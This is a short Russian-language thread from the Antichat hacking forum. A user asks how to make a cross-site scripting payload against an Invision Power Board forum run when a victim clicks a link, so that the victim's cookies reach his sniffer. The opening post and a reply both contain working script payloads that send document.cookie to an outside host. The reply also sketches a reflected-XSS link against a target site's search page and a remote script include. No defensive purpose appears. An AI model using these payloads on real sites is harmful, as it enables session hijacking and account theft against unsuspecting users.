Форум АНТИЧАТ - Ipb не скрипт, а ссылка

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)

- - Ipb не скрипт, а ссылка (https://forum.antichat.xyz/showthread.php?t=16372)

Ipb не скрипт, а ссылка

у меня вопрос, можно ли сделать так, чтобы XSS

Код:

<script>img = new Image(); img.src = "http://s.netsec.ru/blablabla/pic.gif?"+document.cookie;</script>

выполнялся не через отправку сообщения "Жалоба", а после нажатия на ссылку, оставленную в простом сообщении???

или надо сделать страницу на php, с каким-то ещё методом....

вообщем, нужно, чтобы при нажатии на сылку приходила на сниффер таже инфа (можно чтобы больше приходило....), что и при обычном использовании XSS....

Цитата:

вообщем, нужно, чтобы при нажатии на сылку приходила на сниффер таже инфа (можно чтобы больше приходило....), что и при обычном использовании XSS....

<a href=... onclick="javascript:...">ссылка</a>

Цитата:

можно ли сделать

Нельзя.

Если тебе нужна просто ссылка то можно если там есть пассивный XSS. Например _http://target.com/search.php?string=что нибудь на русском<script>img = new Image(); img.src = "http://s.netsec.ru/blablabla/pic.gif?"+document.cookie;</script> либо <script src=http://zzzzzz.com/xss.js?<b>Но это на ламёров.

Ещё можно попробовать так http://forum.antichat.ru/thread9910-explorer.html

спасибо, буду разбираться и думать....